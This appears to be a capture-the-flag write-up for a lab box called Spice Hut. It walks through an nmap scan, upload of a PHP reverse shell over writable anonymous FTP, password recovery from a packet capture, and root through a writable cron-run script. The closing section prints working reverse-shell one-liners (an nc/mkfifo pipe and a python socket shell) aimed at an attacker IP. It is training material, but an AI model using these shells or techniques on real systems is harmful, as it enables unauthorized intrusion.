We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren’t sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!
What is the secret spicy soup recipe?
Let’s start with a Nmap scan
1
nmap -p- -sS --min-rate 10000 --open -vvv -n -Pn 10.10.16.11
1
2
3
4
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 60
22/tcp open ssh syn-ack ttl 60
80/tcp open http syn-ack ttl 60
so we have a web page with a message that there is no spice. I’ll let a gobuster scan run, while I check the FTP server. gobuster dir -u http://10.10.16.11 -w /usr/share/dirb/wordlists/common.txt -x .php
In the FTP server, it admits anonymous login, and we have two files:
notice.txt
1
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I don't know who it is, but Maya is looking pretty sus.
Maya is a potential username.
and important.jpg which is an among us meme photo.
notice how the FTP folder is writable.
now let’s come back to the gobuster scan, and we have something: /files which if we notice is the FTP server. Since we have writing permissions on the FTP server and we have access via the web server, let’s try to upload a reverse shell and execute it from the webserver.
So now you’ll have to be on the directory where you have the reverse shell and connect to the FTP server, go to the folder that we have writing permission, now to upload a file to an FTP server with “put [file name]”, in this case, put reverseshell.php.
now let’s set up a listener that will receive the shell connection request.
1
nc -lvpn [the port you choose on the reverseshell]
and finally, let’s head over to the webpage and execute the file we just upload. It worked! now we have a shell on the target’s machine.
listing the directory we have recipe.txt
What are the contents of user.txt?
Enumerating a little the system, we see that there’s a user ‘lennie’. After a while of looking around, I wasn’t able to find anything, so I’ll try to use linPeas. I’ll make a Python server on my machine with python3 -m http.server then on the target’s machine wget [your IP]:[PORT]/linpeas.sh, and now run it with bash ./linpeas.sh.
after trying without luck, some exploits, I see this directory “/incidents/suspicious.pcapng”, actually a few times during the linpeas execution, this is a format used to record captured network packet traces to a file, so let’s see if we find anything interesting.
transfer it to your local machine with a Python server.
let’s open the file with wireshark and analyze it, the last http request has a directory to a revershell apparently. “[Request URI: http://192.168.33.10/files/ftp/shell.php]” someone that entered the system the same way we did.
let’s export it all into a text file, so it’s easier to read the content ‘file -> Export Packet Dissections > as plain text’ and see what’s in it (I know this is not the best way but will do it) notice how every Linux command is after a hex direction and before that there’s a number like ‘0000’ or ‘0020’ i was looking after those, looking what commands this person entered, and after a ‘sudo -l’ is prompted for a password and there’s a password in the next packet, I thought it was www-data password but it was actually Lennie’s password.
now we can use a more stable shell and login with ssh to the user Lennie.
and in his home directory is the flag user.txt
What are the contents of root.txt?
In Lennie’s directory there’s a “scripts” folder, in it it has a script that put the variable $LIST into the “startup_list.txt”, first I thought there was going to be a crontab that executes this and may be vulnerable, but no. The files also are owned by root and are no writable, except for “/etc/print.sh”.
let’s try to put a reverse shell and execute it
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.17.26.231 1234 >/tmp/f python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.17.26.231”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“sh”)’
bash /etc/print.sh
It worked, and we got root! But not because I executed it. When I ran it, I got an error, so it must be a crontab from the root user, for sure.
now that we are root we can cat the root flag